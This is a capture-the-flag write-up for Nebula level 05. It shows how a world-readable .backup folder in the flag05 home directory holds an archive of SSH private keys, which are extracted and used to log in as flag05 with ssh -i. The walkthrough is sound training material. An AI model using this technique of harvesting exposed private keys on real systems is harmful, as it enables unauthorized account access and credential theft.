Table of contents
Check the flag05 home directory. You are looking for weak directory permissions. To do this level, log in as the
level05
account with the passwordlevel05
. Files for this level can be found in/home/flag05
.
Source code
There is no source code available for this level.
Getting the flag
By checking the flag05
directory we can find unprotected .backup
folder:
level05@nebula:/home/flag05$ ls -lah
total 9.0K
drwxr-x--- 1 flag05 level05 80 2021-06-16 00:17 .
drwxr-xr-x 1 root root 80 2012-08-27 07:18 ..
drwxr-xr-x 2 flag05 flag05 42 2011-11-20 20:13 .backup
-rw------- 1 flag05 flag05 13 2021-06-16 00:17 .bash_history
-rw-r--r-- 1 flag05 flag05 220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag05 flag05 3.3K 2011-05-18 02:54 .bashrc
drwx------ 2 flag05 flag05 60 2021-06-15 23:06 .cache
-rw-r--r-- 1 flag05 flag05 675 2011-05-18 02:54 .profile
drwx------ 2 flag05 flag05 70 2011-11-20 20:13 .ssh
Let’s check and extract those backups:
level05@nebula:/home/flag05$ cd .backup/
level05@nebula:/home/flag05/.backup$ mkdir /tmp/flag05
level05@nebula:/home/flag05/.backup$ tar xvzf backup-19072011.tgz -C /tmp/flag05
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
level05@nebula:/home/flag05/.backup$ cd /tmp/flag05
All right, we got some ssh
keys!
Let’s try them out:
level05@nebula:/tmp/flag05$ cd .ssh
level05@nebula:/tmp/flag05/.ssh$ ls
authorized_keys id_rsa id_rsa.pub
level05@nebula:/tmp/flag05/.ssh$ chmod 600 id_rsa
level05@nebula:/tmp/flag05/.ssh$ ssh -i id_rsa flag05@localhost
_ __ __ __
/ | / /__ / /_ __ __/ /___ _
/ |/ / _ \/ __ \/ / / / / __ `/
/ /| / __/ /_/ / /_/ / / /_/ /
/_/ |_/\___/_.___/\__,_/_/\__,_/
exploit-exercises.com/nebula
For level descriptions, please see the above URL.
To log in, use the username of "levelXX" and password "levelXX", where
XX is the level number.
Currently there are 20 levels (00 - 19).
Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)
* Documentation: https://help.ubuntu.com/
New release '12.04 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account
And we got the flag. Pay attention that chmod 600 id_rsa
and ssh
with -i
flag is required to use this private key.